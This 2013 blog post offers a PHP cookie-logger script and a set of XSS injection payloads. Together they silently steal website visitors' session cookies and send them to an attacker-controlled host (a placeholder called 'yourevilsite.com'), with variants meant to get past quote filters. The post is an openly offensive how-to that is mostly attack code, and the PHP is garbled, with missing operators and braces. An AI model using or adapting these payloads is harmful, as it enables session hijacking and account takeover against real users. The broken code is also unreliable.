Sunday, 11 August 2013

r0ng's cookie logger script - for silently stealing website cookies

For when you want to steal someone's session cookies but you don't want to raise the alarm!


Stealing cookies isn't complicated, but sometimes it can be tricky depending on what is filtered from your JS injection. It can be made much harder if your aim is to steal them silently without the person knowing.

The script

PHP Code:
//Check if cookie file exists, if not create it
if (!file_exists("cookie.txt")) {file_put_contents("cookie.txt""<h1>r0ng's cookie logger</h1>");

 //Set cookie file variable 

$file 'cookie.txt'; 

//Check for password, display cookie file to admin 
if (isset($_GET['pass']) && $_GET['pass'] == "r0ng") {

while (!
is_readable($file)) {

 //Wait for file permissions 

"<table><tr><th>FLAG</th><th>LOCATION</th><th>IP-ADDRESS</th><th>HTTP_USER_AGENT</th><th>COOKIES</th><th>HTTP_REFERER</th></tr>" file_get_contents($file) . "</table>");

//Derive victim's real ip 
$ipAddress $_SERVER['REMOTE_ADDR'];
if (
array_key_exists('HTTP_X_FORWARDED_FOR'$_SERVER)) {
$ipAddress array_pop(explode(','$_SERVER['HTTP_X_FORWARDED_FOR']));

//cURL function for geo API calls
function get_content($URL){
$ch curl_init();
$data curl_exec($ch);

//Setting data variable with victim's info in table form 
$countryCode get_content('http://api.wipmania.com/' $ipAddress);$data "<tr><td><img src=http://www.geonames.org/flags/x/" strtolower($countryCode) . ".gif width='100'></td><td>" $countryCode "</td><td>" htmlspecialchars($ipAddress) . "</td><td>" htmlspecialchars($_SERVER['HTTP_USER_AGENT']) . "</td><td>" . (isset($_GET['cookie']) ? htmlspecialchars($_GET['cookie']) :"") . "</td><td>" . (isset($_SERVER['HTTP_REFERER']) ? htmlspecialchars($_SERVER['HTTP_REFERER']) :"") . "</td><tr>";

while (!
is_writable($file)) {

 //Wait for file permissions 

//Append data to file in new line 



a.) Setting it up:
Upload that script to your webhost (logger.php).
You access the admin panel with /logger.php?pass=r0ng

b.) JS injections:

For most of the injections, we are taking advantage of the inherent stealthiness of XMLHttpRequests. Same-domain restrictions only apply if we need a response from our evil-site (which we don't).

1.) Quotes allowed:

<script>var = new XMLHttpRequest(); a.open("get""http://yourevilsite.com/logger.php?cookie=" document.cookie); a.send();</script> 

2.) Apostrophe allowed:

<script>var = new XMLHttpRequest(); a.open('get''http://yourevilsite.com/logger.php?cookie=' document.cookie); a.send();</script> 

3.) Quotes/apostraphe not allowed:

Note 1: Converting the above charcode array back to string would give:

var = new XMLHttpRequest(); a.open('get''http://yourevilsite.com/logger.php?cookie=' document.cookie); a.send(); 
Here is a newbie friendly site to create charcodes: http://jdstiles.com/java/cct.html

4.) Quotes/apostrophe not allowed but can reference external script:

<SCRIPT SRC=http://yourevilsite.com/evil.js></SCRIPT> 

Note 2: Any of the other injections would be placed inside of the evil.js file (without javascript tags).

5.) Not enough space:

<script>window.location.replace("//yourevilsite.com/logger.php?cookie=" document.cookie)</script> 
Note 3: All of these are silent other than number 5. If you need to use that, you can add a meta-refresh redirect back to the referrer header, easily googleable if you don't know how)

(If you find this useful, why not checkout a advert below to support the blog? :O ) ~r0ng

1 comment: